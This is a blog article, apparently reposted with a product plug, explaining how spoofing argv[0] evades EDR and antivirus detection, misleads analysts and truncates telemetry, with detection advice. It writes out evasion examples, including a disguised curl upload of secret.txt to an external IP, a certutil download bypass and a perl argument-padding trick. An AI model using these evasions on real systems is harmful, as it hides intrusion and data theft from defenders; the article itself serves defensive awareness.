argv[0]: Legacy Convention or Security Risk?

BY Mark Howell 3 September 202415 MINS READ
article cover

Today in Edworking News we want to talk about Command lines are weird. Windows is known for this [1], but as will become apparent, most operating systems implemented command lines in a way that can cause security issues. This post will set out, section by section, what’s wrong with this widely-adopted convention that the first argument of a process’ command line, often referred to as argv[0], is reserved to represent the process’ name.

argv[0] is a relic of the past

Whenever a program is started, it is provided with command-line arguments that are accessible from within the program - in fact, it is one of the first pieces of information that is made available when a program starts, and is a key mechanism for altering a program’s execution flow. Consider the exec family of system calls as defined in POSIX [2], which is adopted by Unix-based systems as well as DOS/Win32 [3]. For example, it defines function execv as:
Calling this function requires the full path of the application to be executed as path and a vector with arguments to be passed to the program as argv; it returns an integer with a status code. The same specification tells us that if a program is successfully executed as a result of this call, it will invoke the targeted program via Across all C standards [4] we see that when a program is called like this, the following three conditions should hold true: argc is non-negative; argv[argc] is a null pointer; and if argc is greater than zero, the string pointed to by argv[0] represents the calling program’s name.
To some, that final condition may be a surprising one. The new process surely knows its own name, why does it need to be passed as the first process argument by the calling process? It is a design decision made to allow the created process to behave differently based on how it is called. Especially in a POSIX context, in which applications can be and frequently are symlinked, it gives the new process awareness of what the calling process was requesting, regardless of what symbolic links were followed. A practical example of this are the shutdown and reboot programs; on Debian, these are symlinked to the same systemctl executable. Depending on what command you call, the underlying process will behave differently.
Although I am not aware of any such real-life examples for Windows, which has much less of a symlink culture, its implementation allows for the same to be possible. This seems like a questionable design decision. Should a program be allowed to behave differently based on its name? From a 2020s standpoint, this seems highly undesirable, as it makes software less predictable and goes against modern design principles. From a 1970s/1980s standpoint, a time when computer resources were scarce, it seems less unreasonable to attempt to minimise any form of duplication and redundancy. Today however, disk space is no longer considered an issue; this is evidenced by macOS Sonoma, where shutdown and reboot are two separate executables.
Another argument against this design is that if you have two programs that are so similar that it pays off to consolidate them into a single file, is there really a need for two separate programs/program names? Is using shutdown and reboot so much more preferable than something along the lines of power --shutdown and power --reboot? Some will answer this with a straight “no”, whereas others argue single-word commands enhance user experience, and (especially a few decades ago) can offer cross-platform/backwards syntax compatibility using a shared code base. Even so, whether this solution is the best way of achieving that, remains doubtful.
Because even if you were to accept this principle, the implementation itself is debatable too. Why would one provide information on what program name was invoked as part of the process arguments, which are designed to be set by the calling process? Should the new process’s code actually rely on argv[0], it is at the mercy of the process that called it to populate it correctly. Should this not be the case, it may break the new process; similarly, there are examples of programs relying on argv[0] in their process flows in incorrect or unsafe ways [5], leading to security issues.
Instead, separating out what is now argv[0] to its own task_struct/PEB feature would appear to be a more solid approach: other “metadata” such as the process’ path, current working directory, etc. are already kept here; it would allow for more consistent tracking and a reduced scope for manipulation. The operating system should be held responsible for populating the value, instead of expecting the calling program to do so.
The operating system that comes closest to doing this is, perhaps surprisingly, Windows. Unlike the other mainstream operating systems, Windows’ own API calls for creating new processes (such as CreateProcess, ShellExecute) do not allow you to set argv[0]: it sets it for you, based on how the path to the executable was provided. Given how C expects argv to be populated, this is actually the most sensible implementation. Still, because of Windows’ adoption of the POSIX exec calls, there are still ways to manually set argv[0]. As argv[0] usually tells you how the program was called, on Windows it shows you if it was invoked via an absolute path (e.g. 1st highlight) or a relative one (e.g. 3rd highlight); what casing was used (e.g. 2nd highlight is upper case) and if it was wrapped in quotes (4th highlight).

argv[0] is ignored (mostly)

Regardless of your stance on argv[0], the painted picture is our reality; argv[0] is a concept we will have to live with. As we will see, this does not come without trouble: when making exec calls, the first two of the aforementioned three conditions are taken care of by the implementing operating system; but the final condition concerning argv[0] is not. Since the caller of exec has full control over argv, it is possible to ignore this requirement. Since the operating system nor the calling program nor the called program are expected to check for violations of this requirement, overriding it can be done without consequences.
For example, to print Hello, world! with echo, the convention is to call e.g. execv("/usr/bin/echo", ["echo", "Hello, world!"]). However, executing execv("/usr/bin/echo", ["oopsie", "Hello, world!"]) will also successfully call the echo program and print Hello, world! to its stdout, despite having argv[0] set to “oopsie”. Most likely, the echo program simply ignores whatever argv[0] is set to and solely focusses on argv[1] and beyond. In fact, this is an approach taken by most programs.

Screenshot showing Sysmon output for a ‘normal’ execl() call (left) and one with a manipulated argv[0] (right).

argv[0] can break defenses

First off, argv0] can be used to fool security software. When a machine is compromised by a malicious user, it will typically manipulate the system in some way or another by running the attacker’s commands. Often, this takes the form of leveraging system-native commands. Defensive software such as AV and EDR monitor process executions, and detect or prevent specific ones if they are deemed harmful. Most solutions proactively look for commands commonly used by attackers (e.g. [9, 10, 11).
For example, the built-in certutil command-line tool on Windows is regularly seen in attacks 12] as a means to download an external payload after gaining an initial foothold. Windows’ pre-installed security software, [Microsoft Defender Antivirus, prevents certutil executions if it sees command-line arguments that suggest a file download is being attempted. As it turns out, the detection logic used by Defender is flawed: as the screenshot below shows, when starting certutil with argv[0] set to one or more spaces, Defender will not prevent the execution.

Although perhaps not the most exciting of examples, it does highlight a wider issue: some detections rely on the program name being part of the command line. Let’s for argument’s sake pretend Defender’s detection logic here could be represented as command_line.contains('certutil') AND command_line.contains('-urlcache'). You can see how the first condition assumes certutil is part of the command line. Whilst this will be almost always the case for the certutil executions it is trying to find, our example shows a counter-example that successfully bypasses this command-line detection.
For this reason, it is strongly recommended to structure detections in a way similar to process_path.endswith('certutil.exe') AND command_line.contains('-urlcache'), as experienced detection engineers are likely to do. Another way in which detections may be bypassed is by adding tuning keywords to argv[0]. It is common for detections to have a base condition that is complemented by additional conditions that filter out false positive alerts. For example, you may have a detection rule that triggers when attrib.exe is used to hide a file [14]. In practice, this happens often legitimately for file desktop.ini, so executions targetting this file may be tuned out [15]. If this is a known exclusion, an attacker could bypass such a detection by including desktop.ini in argv[0], e.g. argv = ['attrib_\desktop.ini', '+H', 'backdoor.exe']1.

argv[0] can deceive

Another way in which argv[0] can be exploited, is by manipulating it in such a way that it fools humans. As discussed before, in enterprise settings, security analysts often review alerts generated by security tooling such as EDR software. Most of such alerts will include the process that is responsible for/associated with the activity that was flagged. The process’ command line is a key piece of information that analysts use to determine whether an alert should be further investigated, escalated, or ignored.
For example, an alert for possible data exfiltration might be triggered when curl -T secret.txt 123.45.67.89 is executed [16], as it uploads file secret.txt to IP address 123.45.67.89 via HTTP [17]. A trained security analyst may further investigate this alert if this behaviour is rare in the environment. The fact that a hard-coded, external IP is used here might increase suspicion; especially if it was not seen before. With this in mind, attackers are more likely to be successful if they manage to make their activity “blend in” with normal activity, thus staying under the radar.
Now consider the same scenario, but with argv[0] changed from curl to curl localhost | grep. This may seem weird, but this is valid: as we have seen, in POSIX, process command lines are an array of strings2, and its first element is nearly always ignored, so we can put in it whatever we want. What’s more, security software often represents the array as a space-separated string. Thus, in this case, it will most likely be represented as curl localhost | grep -T secret.txt 123.45.67.89, despite the arguments that are being passed being ['curl localhost | grep', '-T', 'secret.txt', '123.45.67.89'].

To the human eye, it may now appear as if curl localhost is executed, and its output passed to grep -T secret.txt 123.45.67.89. Despite the latter not making much sense as a command, the command now has an entirely different meaning: it gives the impression curl is used to download information from a local address, even though in reality it is used to upload information to a remote address.
Another deception example is the use of the infamous Right-To-Left Override (RLO) character [18, 19]. The presence of this Unicode character will tell the rendering application to display the characters that follow in reverse order. Inserting the RLO at the end of argv[0] could therefore make ping moc.elgoog.some-evil-website.com look like ping moc.etisbew-live-emos.google.com. Whilst this will not affect detection logic (since it merely messes with how data is displayed), it may well deceive analysts. Invoking a PowerShell command that downloads and executes BloodHound, with argv[0] containing the RLO character \u202E, makes it much harder to understand what is going on when looking at the reported command line.

argv[0] can corrupt telemetry

Finally, there is another way in which argv[0] can raise issues, thanks to the remarkable fact that this often-ignored argument is at the very start of every command line. If you were to stuff argv[0] with enough characters, you will push all other arguments to the very end of the command line. This matters for two reasons: we could once again fool analysts by ‘hiding’ the interesting parts of the command line (hoping they don’t scroll to the very end), but more interestingly, if you make the total command line length long enough, the actually relevant arguments may get truncated by monitoring software.
Since Windows 7, the maximum length of a command line on Windows is 14,336 characters [20], which equates to 14 KiB; in the Linux kernel the maximum is hardcoded to 32 page sizes [21] which on 64-bit architecture typically works out as 131,072 characters (128 KiB), whereas macOS Sonoma allows command lines to span up to a whopping 1,048,576 characters (1 MiB). That is a lot of arbitrary space argv[0] could potentially fill up. Process monitoring software like EDR might either log such long command-line executions in full, or it may truncate it at a fixed length to reduce overhead. In case of the former, it is easy to see how someone might generate 1GiB worth of logging data on macOS by simply starting 1,000 processes utilising the maximum command-line length. Should some form of truncation be applied, it will be possible to cut off command-line arguments from the telemetry: a command like perl -e 'exec {"echo"} "_"x50000, "Hello, world!"' will successfully output “Hello, world!”, but telemetry of the execution may just record a bunch of underscores, or in some cases even a completely empty command line. Thus, the relevant command-line arguments are not present, and detection logic as well as analysts will be blind to what is actually going on.

Although the echo command executed successfully, the process telemetry ending up in this SQL-based data lake only contains spoofed argv[0] data and no actual command-line arguments, as data is truncated at 32,766 characters.

argv[0] considered harmful: prevention and detection

All in all, we see that in trying to solve one problem, the concept of argv[0] introduces several other problems. Since argv[0] won’t be going away anytime soon, it is worth focussing on how to deal with this from a security standpoint. Although software developers could validate whether the passed argv[0] has been tampered with by comparing it with its own filename, it is a solution that doesn’t scale well, and as argued before, is something the operating system could do much more reliably. As relying on argv[0] for changing a program’s flow is also highly inadvisable, developers are best off not interacting with it at all.
For security professionals, awareness of how argv[0] works and what flaws it introduces is an important step in countering any command-line deception. This post aims to help in this regard. Furthermore, it may be possible to automatically detect some argv[0]-based bypasses. Should your security software provide command-line arguments as an array instead of a space-separated string, it should be possible to reliably identify some of the described patterns. Overly long argv[0] values or ones containing suspicious characters like the pipe character should instantly be flagged as suspicious. Even with command-line arguments presented as a string, it should be possible to flag command lines that do not contain the program’s name, which suggests it has been tampered with. The mere presence of an RLO character in a command line is in most environments a high-efficacy detection.
For possibly truncated command-line arguments, make sure you understand how your security solution and data lake handle this and how it affects the generated telemetry; are single event entries capable of holding all command-line data, even when stretched to the maximum? Finally, this post calls for defensive software to improve their detection of argv[0] abuse. Preventing software executions with suspicious argv[0] values should be possible without causing any false positives. EDR platforms should also consider leaving out argv[0] when reporting on command-line arguments, as this will eliminate nearly every problem highlighted in this post; its forensic value is often minimal to none, or can be more reliably sourced from other process aspects.
Ultimately, nobody wants to be bothered by argv[0]. And neither should our software.

Remember these 3 key ideas for your startup:

  1. Security Awareness: Understanding how argv[0] can be manipulated is crucial for maintaining robust security. Ensure your team is aware of these potential vulnerabilities and how they can be exploited.

  2. Detection Logic: Structure your detection logic to avoid relying on argv[0]. Instead, focus on more reliable indicators such as the process path and other command-line arguments.

  3. Use Comprehensive Tools: Leverage advanced security tools that can detect and prevent argv[0] manipulation. Edworking is the best and smartest decision for SMEs and startups to be more productive. Edworking is a FREE superapp of productivity that includes all you need for work powered by AI in the same superapp, connecting Task Management, Docs, Chat, Videocall, and File Management. Save money today by not paying for Slack, Trello, Dropbox, Zoom, and Notion.
    For more details, see the original source.

article cover
About the Author: Mark Howell Linkedin

Mark Howell is a talented content writer for Edworking's blog, consistently producing high-quality articles on a daily basis. As a Sales Representative, he brings a unique perspective to his writing, providing valuable insights and actionable advice for readers in the education industry. With a keen eye for detail and a passion for sharing knowledge, Mark is an indispensable member of the Edworking team. His expertise in task management ensures that he is always on top of his assignments and meets strict deadlines. Furthermore, Mark's skills in project management enable him to collaborate effectively with colleagues, contributing to the team's overall success and growth. As a reliable and diligent professional, Mark Howell continues to elevate Edworking's blog and brand with his well-researched and engaging content.

Trendy NewsSee All Articles
CoverVisual Prompt Injections: Essential Guide for StartupsThe Beginner's Guide to Visual Prompt Injections explores vulnerabilities in AI models like GPT-4V, highlighting security risks for startups and offering strategies to mitigate potential data compromises.
BY Mark Howell 2 mo ago
CoverGraph-Based AI: Pioneering Future Innovation PathwaysGraph-based AI, developed by MIT's Markus J. Buehler, bridges unrelated fields, revealing shared complexity patterns, accelerating innovation by uncovering novel ideas and designs, fostering unprecedented growth opportunities.
BY Mark Howell 2 mo ago
CoverRevolutionary Image Protection: Watermark Anything with Localized MessagesWatermark Anything enables embedding multiple localized watermarks in images, balancing imperceptibility and robustness. It uses Python, PyTorch, and CUDA, with COCO dataset, under CC-BY-NC license.
BY Mark Howell 2 mo ago
CoverJungle Music's Role in Shaping 90s Video Game SoundtracksJungle music in the 90s revolutionized video game soundtracks, enhancing fast-paced gameplay on PlayStation and Nintendo 64, and fostering a cultural revolution through its energetic beats and immersive experiences.
BY Mark Howell 2 mo ago
CoverMastering Probability-Generating Functions: A Guide for EntrepreneursProbability-generating functions (pgfs) are mathematical tools used in probability theory for data analysis, risk management, and predictive modeling, crucial for startups and SMEs in strategic decision-making.
BY Mark Howell 31 October 2024
CoverMastering Tokenization: Key to Successful AI ApplicationsTokenization is crucial in NLP for AI apps, influencing data processing. Understanding tokenizers enhances AI performance, ensuring meaningful interactions and minimizing Garbage In, Garbage Out issues.
BY Mark Howell 23 October 2024
CoverReviving Connection: What We Lost with the Decline of Letter WritingThe shift from handwritten letters to digital communication has reduced personal connection, depth, and attentiveness, impacting how we communicate and relate in both personal and business contexts.
BY Mark Howell 23 October 2024
CoverLichess Move: Behind-the-Scenes Technical BreakdownWhen you make a move on lichess.org, it triggers real-time data exchanges via WebSocket, updates game state, and ensures seamless gameplay using Redis Pub/Sub and MongoDB.
BY Mark Howell 23 October 2024
Try EdworkingA new way to work from  anywhere, for everyone for Free!
Sign up Now